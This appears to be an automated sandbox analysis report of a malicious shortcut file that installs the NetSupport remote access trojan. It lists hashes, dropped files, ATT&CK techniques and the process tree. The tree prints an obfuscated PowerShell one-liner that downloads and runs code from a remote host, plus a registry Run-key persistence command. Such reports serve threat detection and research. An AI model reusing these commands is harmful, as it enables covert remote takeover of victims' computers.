netsupport | ffef5e27c12638a777da0075c6fc07b9f32c073260f6ba5f6c45198a43d1b295

Analysis

max time kernel
82s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
20/10/2022, 12:54

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

374468737/374468737.lnk
Size

1KB
MD5

2cad427f0452c5fc4f16e5546739e9d1
SHA1

47cd6ec6ead4f87587f6ad75e49ecc8c6d21b08c
SHA256

06ef56763e85772ed9243770c932eaacdd73da2021f1669f9f0716c2e7878db6
SHA512

70fed8f7790b38146d8fb7968506e430668e8bb1375a15dbc7beb94b49b5266706118e9ce3d53043bc66ff5f6f8d97bc3847f9eaee6afb59163326fab1f799d9

Score

10^/10

netsupport persistence rat

Malware Config

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 1 IoCs

flow	pid	Process
10	2092	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2816	whost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 5 IoCs

pid	Process
2816	whost.exe
2816	whost.exe
2816	whost.exe
2816	whost.exe
2816	whost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\XKMGui1hwfas\\whost.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2092	powershell.exe
2092	powershell.exe
2412	powershell.exe
2412	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeSecurityPrivilege	2816	whost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2816	whost.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1824 wrote to memory of 3772	1824	cmd.exe	86
PID 1824 wrote to memory of 3772	1824	cmd.exe	86
PID 3772 wrote to memory of 2092	3772	conhost.exe	87
PID 3772 wrote to memory of 2092	3772	conhost.exe	87
PID 2092 wrote to memory of 2412	2092	powershell.exe	94
PID 2092 wrote to memory of 2412	2092	powershell.exe	94

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\374468737\374468737.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1824
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" --headless powershell @(747,745,703,748,766,693,763,758,759,694,761,748,750)|foreach{$01jd=$01jd+[char]($_-647)};$njk6='rl';new-alias j cu$njk6;.$([char](10492-10387)+'ex')(j -useb $01jd)
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell @(747,745,703,748,766,693,763,758,759,694,761,748,750)|foreach{$01jd=$01jd+[char]($_-647)};$njk6='rl';new-alias j cu$njk6;.$([char](10492-10387)+'ex')(j -useb $01jd)
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name ExpirienceHost -Value C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\whost.exe
      4⤵
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2412

C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\whost.exe
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\whost.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2816

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4b489181baebef08318ffd04e50e4bc

SHA1
2baaaee18e946a902a73f733fe7fd48b73ff8161

SHA256
f5238a75704242412126346f8a2787d170e914e946920ea7869a13ea24aca8fb

SHA512
9f788804374031a15d3c39666c31f3ba9d3a9a4beedf7543621135dc434ee4235656dec973ed6ab7ecad0822c470d536250f884560b6925b5fbc69d1cee0a904

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\NSM.LIC

Filesize
257B

MD5
390c964070626a64888d385c514f568e

SHA1
a556209655dcb5e939fd404f57d199f2bb6da9b3

SHA256
ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54

SHA512
f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\PCICHEK.DLL

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\PCICL32.DLL

Filesize
3.6MB

MD5
00587238d16012152c2e951a087f2cc9

SHA1
c4e27a43075ce993ff6bb033360af386b2fc58ff

SHA256
63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

SHA512
637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\PCICL32.dll

Filesize
3.6MB

MD5
00587238d16012152c2e951a087f2cc9

SHA1
c4e27a43075ce993ff6bb033360af386b2fc58ff

SHA256
63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

SHA512
637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\client32.ini

Filesize
695B

MD5
1d78b25cdda1b450c8b8cba4018cea6e

SHA1
a0e9375e477a1f60711416f971afe561868d1510

SHA256
c9c95c604e74494e617dc77796db274e30f92a14a31fc7c124a9209a22998fde

SHA512
2f4be93967a51c04f2f5bfb58d23b48e1053c8c79d7188e35b6ab18654dec1fbb581ff1346e1c92d4b84f87788956ce31dc0a625a2220011117d680cb533ecc9

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\pcichek.dll

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\whost.exe

Filesize
117KB

MD5
c0eb3eac96511077dafc0afa64c6388c

SHA1
33e81f25493eda3bbf0b7cdcddd523547fa6c31e

SHA256
eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a

SHA512
2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

Download Submit
C:\Users\Admin\AppData\Roaming\XKMGui1hwfas\whost.exe

Filesize
117KB

MD5
c0eb3eac96511077dafc0afa64c6388c

SHA1
33e81f25493eda3bbf0b7cdcddd523547fa6c31e

SHA256
eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a

SHA512
2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

Download Submit
memory/2092-135-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download
memory/2092-136-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download
memory/2092-137-0x000001A378A80000-0x000001A378A8A000-memory.dmp

Filesize
40KB

Download
memory/2092-138-0x000001A378AB0000-0x000001A378AC2000-memory.dmp

Filesize
72KB

Download
memory/2092-134-0x000001A37A630000-0x000001A37A652000-memory.dmp

Filesize
136KB

Download
memory/2092-157-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download
memory/2412-140-0x00007FFBFEB30000-0x00007FFBFF5F1000-memory.dmp

Filesize
10.8MB

Download